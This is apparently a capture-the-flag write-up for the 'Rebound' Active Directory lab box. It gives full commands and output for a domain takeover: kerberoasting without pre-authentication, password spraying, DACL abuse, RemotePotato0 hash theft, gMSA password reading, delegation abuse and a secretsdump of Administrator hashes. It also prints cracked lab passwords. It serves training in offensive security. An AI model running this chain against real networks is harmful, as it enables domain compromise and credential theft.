# Rebound
## Enumeration
```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ sudo nmap -sC -sV -Pn 10.10.11.231
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 23:27 EST
Nmap scan report for rebound.htb (10.10.11.231)
Host is up (0.053s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-24 11:27:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-time:
| date: 2023-12-24T11:28:20
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.41 seconds
```
Enumerating SMB and LDAP yielded me nothing. But i was able to connect to SMB unauthenticated without perms using **rpcclient** so i proceeded with enumerating potential users with [rid cycling](https://www.trustedsec.com/blog/new-tool-release-rpc_enum-rid-cycling-attack).
```bash
kali)-[~/Desktop/CTF/Windows Stuff]
└─$ crackmapexec smb 10.10.11.231 -u "Guest" -p ''
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\Guest:
┌──(kali㉿kali)-[~/Desktop/CTF/Windows Stuff]
└─$ ridenum 10.10.11.231 0 20000 Guest ''
[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information:
Domain Name: rebound
Domain Sid: S-1-5-21-4078382237-1492182817-2568127209
[*] Moving on to extract via RID cycling attack..
[*] Enumerating user accounts.. This could take a little while.
Account name: rebound\Administrator
Account name: rebound\Guest
Account name: rebound\krbtgt
Account name: rebound\DC01$
Account name: rebound\ppaul
Account name: rebound\llune
Account name: rebound\fflock
Account name: rebound\jjones
Account name: rebound\mmalone
Account name: rebound\nnoon
Account name: rebound\ldap_monitor
Account name: rebound\oorend
Account name: rebound\winrm_svc
Account name: rebound\batch_runner
Account name: rebound\tbrady
Account name: rebound\delegator$
[*] RIDENUM has finished enumerating user accounts...
```
I then tried AS-REP roasting hoping for some quick wins for initial access but could not crack the hash which probbaly meant this was not intended.
```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-GetNPUsers -dc-ip 10.10.11.231 -request -format hashcat -usersfile users.txt rebound.htb/
Impacket v0.11.0 - Copyright 2023 Fortra
$krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb587387c2d53bf69a0c$f3b60b15f622dbbde4153402b6320449e99e574a4f5c691fe415cec470cb8f52c3d4d3ae1d2c0029b23f7cab1751aaa493cf48c63c93358774333705ee62c827d33ee30503a81955ae1105ba4532d106c8ec07611af9c23b3d43a57f12c92f9cac5cb1c13a0f3576dde3fa29b2e1e484c227e615ea196a9fef98a31c552767e2b73892228cf77e55607adc1fb82712d39537f5c88db47c8e12c1d713789de07c6f561d5a86f0cbecf54c9e7232355c8af83c69aa60fc54915019b7e965496a5b15fa6dbfc45a9df367033a9233bf20a64b7aa8356fc300f9c906cef1c308b33a58c01057f3b332638f1b
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
```
```bash
──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ hashcat jjones_asrep_hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
...
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb5873...638f1b
Time.Started.....: Sat Dec 23 23:39:49 2023 (13 secs)
Time.Estimated...: Sat Dec 23 23:40:02 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1270.6 kH/s (0.86ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 59%
Started: Sat Dec 23 23:39:31 2023
Stopped: Sat Dec 23 23:40:04 2023
```
After a very long time, I then stumbled across[ this article](https://www.horizon3.ai/from-cve-2022-33679-to-unauthenticated-kerberoasting/), talking about kerberoasting without pre-authentication. Similar to AS-REP roasting, the exploit leverages two things which we all have.
* [x] Having a user account with pre-authentication disabled (We have the user account `jjones` )
* [x] Having one or multiple valid service account to target (We have a list of users in the domain)
To keep myself sane from all the impacket branch errors i was receiving, i decided to use a Windows VM and perform the exploit using Rubeus and the `/nopreauth` parameter.
```bash
PS C:\Users\nicholas\Desktop > ./Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"rebound.htb" /dc:"DC01.rebound.htb" /nopreauth:"jjones" /spns:C:\Users\nicholas\Desktop\users.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.1
[*] Action: Kerberoasting
[*] Using jjones without pre-auth to request service tickets
[*] Target SPN : Administrator
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : Guest
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : krbtgt
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Target SPN : DC01$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Target SPN : ppaul
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : llune
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : fflock
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : jjones
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : mmalone
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : nnoon
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : ldap_monitor
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Target SPN : oorend
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : winrm_svc
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : batch_runner
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : tbrady
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : delegator$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Roasted hashes written to : C:\Users\nicholas\Desktop\kerberoastables.txt
Commando VM 01/19/2024 04:32:31
```
We can now try to crack these hashes using hashcat and rockyou giving us the password of `ldap_monitor`.
```bash
PS C:\Users\Admin\Downloads\hashcat-6.2.6\hashcat-6.2.6> .\hashcat.exe .\kerberoastables.txt .\rockyou.txt -m 13100
hashcat (v6.2.6) starting
Successfully initialized the NVIDIA main driver CUDA runtime library.
Failed to initialize NVIDIA RTC library.
* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
CUDA SDK Toolkit required for proper device support and utilization.
Falling back to OpenCL runtime.
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 3.0 CUDA 12.2.68) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #1: NVIDIA GeForce RTX 3060 Ti, 8064/8191 MB (2047 MB allocatable), 38MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashfile '.\kerberoastables.txt' on line 1 ($krb5t...4D5680553C119B86D292DEFCDD2440D3): Separator unmatched
Hashfile '.\kerberoastables.txt' on line 2 ($krb5t...7605771D47A8BAF35BE68F999FEB075C): Separator unmatched
Hashfile '.\kerberoastables.txt' on line 4 ($krb5t...DF98A1F9E012EF7C76CB77E5571E4F16): Separator unmatched
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 333 MB
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
$krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*$bf482204b205a0ec5544a9c3efc7fd0b$eefbb2ffa6ccb05ad554d7e2116f87de4da6bfd4617f19a a1e83a4d3ecc700cafca0f3b2fa2f7840398ed5a12bbba7c5ec5a61e98b7876a2b2b8c9d5c874a269df71e6801167ed703dddd4cf661cc11242efbab0d581b1fe8b2b be8798330f912621d5a2cf34fce238c66b7f2fb20c37e2045ceccb2f89bc0a551ddfb43d024e3dc993e20d509da1905c813a48370672e5a372fd5995eb0698d0ee621 1aa7835be9b95df254c90fbcc2015bbc158d6dd91eac729adf9e3fee4d31fa7a26b9caefaf07f2fe6e76702b8e6dc359e20d83e9cf7b99ba3684e900fd38bf7645534 499cb23b0d973ac95f0b70deca3364a07d2775aaf51c27d2f92df7a8c8199ba1bfff9ed404c964f1eed2b376b09c4e190c3f9ddff8276ccddd1ae9829f88054efc27f fac6e475d67a5a838da89e0aac61d8011dea6058238693d9390213eeb0b9e1e7637cb1b4d0c27ced6bfd17e2abfdd72b13cc50138be85951f9fc5a9583d8c2dd039a3 325a25395a579ee122412342fa79827cd8a2743658f3ee0cd281e6e83b5b36d15ba27479c7276a4b58a8b9238aae7ff579ea72aaab0bdd3cb640f9a39df96a2b211df fb09b0a88940d6654bcd2de4daaeb69c0c35b0dc5ba88588ede34e4e26ea776b893e317c0691fbadad090d7b38dbabf32b37b7bc4bd32e6dabb3a3709727d18af0df9 9423ad2e81d40f0cef7adb272df4d536d2802fdf201f0ac05019194fb38b0dc60d4f9d284afdeea1be32265e9cedc3e360a6be7ffa08a1261beb933c049af1d9e8f8d da59e2c1cd3c7186422456f7ef52c2e42641aad761ea94f2d1837a477fceff40b6abc9eb9f6d7e6467ded8925d36dc54ff2a4cf567df708273e72f1e33e4cf8f194e3 39071a080c525af589811eac49e64776f492dbfdf9f32e63dd574bc6c5efabfa7fe28148cac01be172adde18e2105b1c56a048cc134726cbb8baa744de0c32fb2c502 2d43da79e3d3632b3d2c7d75b419802ce3110883cfc19e9a65f01b4006edb7e0ea889ed43ef9b073abb091da9db9114bc60a37fb0075d1856c2715a31fd87f826b499 997d703ab68f383c67c2d325189210f9fe00c2f40c46c771b04008384fa019cd2b2264aeb01de837a60a0bdd3a0e24b971c8a95d834d89c954bd1c02b0b5538863dca a15e16f5d848227305cb24d65ca106f30ce49c3928cdf96ccf595b8247564d2af9744023a83f9b8ba0a28672e766def4de9a07b9d297bbd9d28c7264f110ca063f0a4 4cd71547418240a9fa0711b4b0289057d123cb85d6db5b50e08fdcd844dfb8ac8aa94baabfceda9df0c9599d874878d30f3679a2f26a9fa2df65c6289593cade54:1G GR8t@$$4u
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*...cade54
Time.Started.....: Fri Jan 19 20:40:48 2024 (1 sec)
Time.Estimated...: Fri Jan 19 20:40:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18875.9 kH/s (6.48ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 13697024/14344384 (95.49%)
Rejected.........: 0/13697024 (0.00%)
Restore.Point....: 12451840/14344384 (86.81%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 40432330 -> 0860478331
Hardware.Mon.#1..: Temp: 61c Fan: 69% Util: 29% Core:1995MHz Mem:6800MHz Bus:16
Started: Fri Jan 19 20:40:46 2024
Stopped: Fri Jan 19 20:40:49 2024
```
## Initial Foothold
After obtaining domain credentials, I then proceeded to map the domain using bloodhound and managed to see route for lateral movement to obtain user access but not with the users we have on hand.
A path to user maybe?
From the graph above, our main goal is either to
1. Obtain either PPAUL or FFLOCK user account OR
2. Enroll ourselves as a group member of SERVICEMGMT somehow
**Obtain either PPAUL or FFLOCK user account**
Using the existing password obtained from `ldap_monitor's` account, i performed password spraying using crackmapexec and managed to get a match on the user `oorend` .
```bash
┌──(kali㉿kali)-[~/…/CTF/Boxes/Rebound/impacket-master]
└─$ crackmapexec smb rebound.htb -u ../users.lst -p '1GR8t@$$4u' --continue-on-success
SMB dc01.rebound.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB dc01.rebound.htb 445 DC01 [-] rebound.htb\Administrator:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB dc01.rebound.htb 445 DC01 [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB dc01.rebound.htb 445 DC01 [-] rebound.htb\krbtgt:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB dc01.rebound.htb 445 DC01 [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB dc01.rebound.htb 445 DC01 [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB dc01.rebound.htb 445 DC01 [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB dc01.rebound.htb 445 DC01 [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB dc01.rebound.htb 445 DC01 [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB dc01.rebound.htb 445 DC01 [-] rebound.htb\nnoon:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB dc01.rebound.htb 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u
SMB dc01.rebound.htb 445 DC01 [+] rebound.htb\oorend:1GR8t@$$4u
SMB dc01.rebound.htb 445 DC01 [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB dc01.rebound.htb 445 DC01 [-] rebound.htb\batch_runner:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB dc01.rebound.htb 445 DC01 [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE
```
Sadly, the password spraying did not work on both PPAUL and FFLOCK.
**Enroll ourselves as a group member of SERVICEMGMT somehow**
I then remembered some ACLs permissions are not explicitly shown in bloodhound and must be explicitly enumerated using something like PowerView's `FindDomainObjectAcl`. However I kept recieving the error `Server not operational`.
I then struggled to find a Linux alternative till i finally stumbled across impacket's `dacledit` which essentially allows me to enumerate whether the principal `oorend` has any permissions over the target `SERVICEMGMT` group.
```bash
┌──(kali㉿kali)-[~/…/Boxes/Rebound/impacket-master/examples]
└─$ python3 ./dacledit.py -action read -target SERVICEMGMT -principal oorend -dc-ip 10.10.11.231 rebound.htb/'oorend':'1GR8t@$$4u' -use-ldaps -k
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-4078382237-1492182817-2568127209-7682)
[*] ACE[2] info
[*] ACE Type : ACCESS_ALLOWED_ACE
[*] ACE flags : None
[*] Access mask : Self (0x8)
[*] Trustee (SID) : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
```
Success!, we know that oorend has `Self` permission meaning that he has the ability to add himself to the `SERVICEMGMT` group.
We can easily do that using [bloodyAD's `AddGroupMember`](https://www.thehacker.recipes/ad/movement/dacl/grant-rights) functionality.
{% code overflow="wrap" %}
```bash
─[sg-free-1]─[10.10.14.122]─[NicholasSoh@htb-x8h8zosurg]─[~/Desktop]
└──╼ [★]$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host 10.10.11.231 add groupMember SERVICEMGMT oorend
[+] CN=oorend,CN=Users,DC=rebound,DC=htb added to CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB
```
{% endcode %}
Referencing the bloodhound graph earlier, `SERVICEMGMT` group has `GenericAll` privileges over the OU `SERVICE USERS` or Full Control.
Once again, we can use impacket's `dacledit` to grant us full control perms as `oorend` .
```bash
┌──(kali㉿kali)-[~/…/Boxes/Rebound/impacket-master/examples]
└─$ python3 dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'oorend' -target-dn 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' rebound.htb/'oorend':'1GR8t@$$4u' -dc-ip 10.10.11.231 -k -use-ldaps
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240119-175009.bak
[*] DACL modified successfully!
```
As `oorend`, we have full control over the OU `Service Users` and subsequently `winrm_svc`.
We can now change the password of `winrm_svc` easily using `rpcclient` and subsequently ps-remote to get the user flag.
```bash
└─$ rpcclient -U rebound.htb/oorend rebound.htb
Password for [REBOUND.HTB\oorend]:
rpcclient $> setuserinfo2 winrm_svc P@ssw0rd
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 winrm_svc 23 P@ssw0rd
rpcclient $>
```
## Privilege Escalation
Using `query user`, we see that the user `tbrady` is logged on.
```bash
PS C:\Users\winrm_svc>
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
tbrady console 1 Active none 25/11/2023 8:24 AM
```
For some reason, the same command no longer gives me this output as of 20/1/2024
```bash
PS C:\Users\winrm_svc\Documents> query user
No User exists for *
```
From here, we can utilize [RemotePotato0](https://github.com/antonioCoco/RemotePotato0) which allows us to get the ntlm hash of any user logged in on the target machine which in this case is `tbrady.`
```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999
PS C:\Users\winrm_svc\Documents> .\RemotePotato0.exe -m 2 -x 10.10.16.17 -p 9999 -s 1
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (nul
l) to your victim machine on port 9999
[*] Example Network redirector:
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 104 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!
NTLMv2 Client : DC01
NTLMv2 Username : rebound\tbrady
NTLMv2 Hash : tbrady::rebound:25cb25d078aa7cda:5d015a1e05ab333b0fc68d64bd26e5c7:01010000000000004c7bf203dc4bda0194875567cf8b3e9e0000000002000e00720
0650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e
0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008004c7bf203dc4bda0106000400060000000800300030000000000000000100000000200
000dec4cf9ef2d2a48c6c2af0bea86ea62183c13f07d827c4a1ebcfecd25e1a2f800a00100000000000000000000000000000000000090000000000000000000000
```
Cracking with rockyou, we get the password `543BOMBOMBUNmanda` .
Looking back at bloodhound, we see that user `tbrady` has `ReadGMSAPassword` over `DELEGATOR$`.
This means we can actually[ read `DELEGATOR$'s` hash via the `msDS-ManagedPassword` attribute](https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword).
```bash
──(kali㉿kali)-[~/…/CTF/Boxes/Rebound/gMSADumper]
└─$ bloodyAD -d rebound.htb -u tbrady -p '543BOMBOMBUNmanda' --host dc01.rebound.htb get object 'delegator$' --attr msDS-ManagedPassword
distinguishedName: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:177ae2598e4f659488b6cd0a237df1fc
msDS-ManagedPassword.B64ENCODED: lYA9ZPQxWkDehiHAljsucRRnh5N0HqwjJlbAqxWzhzsH3SGikzaR6F+rMpbBQqpDZBkktx2va1e+xSr+6a1jZrAupT3pvoKoV+Uja9ag0U4iavTkEtZKylKCStup68owRI9pkKsXzn+Dcz8K6fs80d2AHPNE6EWaLMakVbu7l49PqYQ8bltyjO71cEoDH7UcnJbqNwoXksbsFwMWK/Q0pL3TLQ2Ems8Ex2ng+ao9fYEPd79THKR13LwkwowzOYXF3THskJPmfUcSnibo5uvqnZXcjLczpsJSixShdooHHgjrxOweFu8GAGSfdS/nNBou1mqcq2RFQ4sDA/bhFuqJ6Q==
```
The name of the account suggests exploiting something regarding delegations. To enumerate the delegation properties of the `DELEGATOR$` account, we need to use [PoweView's `GetNetComputer` and filter the properties](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation).
```powershell
PS C:\Users\winrm_svc\Documents> Get-NetComputer delegator | Select-Object -ExpandProperty msds-allowedtodelegateto | fl
http/dc01.rebound.htb
```
We see that `$DELEGATOR` has the `msds-allowedtodelegateto` property for the service `http/dc01.rebound.htb`.
However, from our bloodhound output, `Administrator` user cannot be delegated.
With reference to [this](https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained), RBCD (Resource-based Constrained Delegation) can be used to bypass this. \
To perform this attack, we need two things which we already have.
1. A account with SPN - `ldap_monitor` user fiits the requirement
2. An account with the capability to edit the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of another object OR
1. [Our own machine account via `DELEGATOR$` as machine accounts are allowed to edit their own `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute](https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd)
Using impacket's `RBCD`, we can exploit this by appending value of `ldap_monitor` to `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of `DELEGATOR$`.
```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-rbcd 'rebound.htb/delegator$' -delegate-to 'delegator$' -delegate-from ldap_monitor -use-ldaps -action write -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
[*] ldap_monitor can already impersonate users on delegator$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
```
We can now obtain a ticket via delegation operation.
```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-getST -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Impersonating dc01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache
```
Once the ticket is obtained, it can be used in a S4U2proxy request, made by `DELEGATOR$`, on behalf of the impersonated user, to obtain access to one of the services `DELEGATOR$` can delegate to.
```bash
──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-getST -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket "dc01$.ccache" "rebound.htb/delegator$" -hashes aad3b435b51404eeaad3b435b51404ee:177ae2598e4f659488b6cd0a237df1fc -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating dc01$
[*] Using additional ticket dc01$.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache
```
Finally, we can get the Administrator hash via secretsdump.
```bash
──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-secretsdump -k dc01.rebound.htb -just-dc-user administrator -dc-ip 10.10.11.231 -debug
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /home/kali/.pyenv/versions/3.9.16/lib/python3.9/site-packages/impacket
[+] Using Kerberos Cache: dc01$.ccache
[+] Domain retrieved from CCache: rebound.htb
[+] SPN CIFS/DC01.REBOUND.HTB@REBOUND.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for HTTP/DC01.REBOUND.HTB@REBOUND.HTB
[+] Using TGS from cache
[+] Changing sname from http/dc01.rebound.htb@REBOUND.HTB to CIFS/DC01.REBOUND.HTB@REBOUND.HTB and hoping for the best
[+] Username retrieved from CCache: dc01$
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for administrator
[+] Calling DRSGetNCChanges for {37857665-6e2e-4f12-9976-5c9babcd8282}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=rebound,DC=htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...
```
